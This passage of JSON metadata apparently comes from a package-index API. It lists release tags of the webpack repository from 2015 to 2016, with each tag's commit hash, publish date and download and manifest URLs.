0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":n